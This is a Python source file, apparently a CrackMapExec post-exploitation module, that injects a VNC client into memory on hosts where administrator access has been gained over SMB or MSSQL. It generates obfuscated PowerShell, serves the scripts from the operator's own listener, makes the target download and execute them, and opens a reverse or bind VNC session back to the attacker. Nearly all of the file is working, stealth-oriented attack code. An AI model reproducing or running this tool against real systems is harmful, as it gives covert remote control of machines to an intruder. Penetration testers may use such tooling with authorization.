from cme.helpers.powershell import * class CMEModule: ''' Executes Invoke-VNC Module by @byt3bl33d3r ''' name = 'invoke_vnc' description = "Injects a VNC client in memory" supported_protocols = ['smb', 'mssql'] opsec_safe = True multiple_hosts = True def options(self, context, module_options): ''' CONTYPE Specifies the VNC connection type, choices are: reverse, bind (default: reverse). PORT VNC Port (default: 5900) PASSWORD Specifies the connection password. ''' self.contype = 'reverse' self.port = 5900 self.password = None if 'PASSWORD' not in module_options: context.log.error('PASSWORD option is required!') exit(1) if 'CONTYPE' in module_options: self.contype = module_options['CONTYPE'] if 'PORT' in module_options: self.port = int(module_options['PORT']) self.password = module_options['PASSWORD'] self.ps_script1 = obfs_ps_script('cme_powershell_scripts/Invoke-PSInject.ps1') self.ps_script2 = obfs_ps_script('invoke-vnc/Invoke-Vnc.ps1') def on_admin_login(self, context, connection): if self.contype == 'reverse': command = 'Invoke-Vnc -ConType reverse -IpAddress {} -Port {} -Password {}'.format(context.localip, self.port, self.password) elif self.contype == 'bind': command = 'Invoke-Vnc -ConType bind -Port {} -Password {}'.format(self.port, self.password) vnc_command = gen_ps_iex_cradle(context, 'Invoke-Vnc.ps1', command, post_back=False) launcher = gen_ps_inject(vnc_command, context) ps_command = create_ps_command(launcher) connection.execute(ps_command) context.log.success('Executed launcher') def on_request(self, context, request): if 'Invoke-PSInject.ps1' == request.path[1:]: request.send_response(200) request.end_headers() request.wfile.write(self.ps_script1) elif 'Invoke-Vnc.ps1' == request.path[1:]: request.send_response(200) request.end_headers() request.wfile.write(self.ps_script2) request.stop_tracking_host() else: request.send_response(404) request.end_headers()